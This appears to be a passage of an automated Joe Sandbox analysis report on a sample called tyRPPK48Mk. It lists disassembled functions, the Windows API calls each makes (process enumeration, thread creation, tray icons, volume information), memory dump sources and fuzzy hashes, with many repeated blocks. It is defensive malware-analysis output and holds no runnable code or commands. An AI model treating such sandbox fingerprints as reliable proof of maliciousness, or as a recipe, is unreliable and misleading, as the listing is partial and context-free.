                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3300667738-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %lu$\VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3164766367-2432546070
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3636473452
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433EE0 Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00433EFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00433F63
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00433F76
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433F86
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433DF5 Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00433E6D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00433E80
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433E90
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 135935984-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 66738fc5919b7c3a3c7c4a311c48fd84e22d6c2a66b6279363cc5d51ef299119
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 832180B6500118AFDB11CF90CD85EEEB379EB8C700F10459AFA0997150DA75AA85CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0041F707
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: [B
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1020059152-632041663
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00413DBD
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00413E07
                                                                                                                                                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 155776804-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
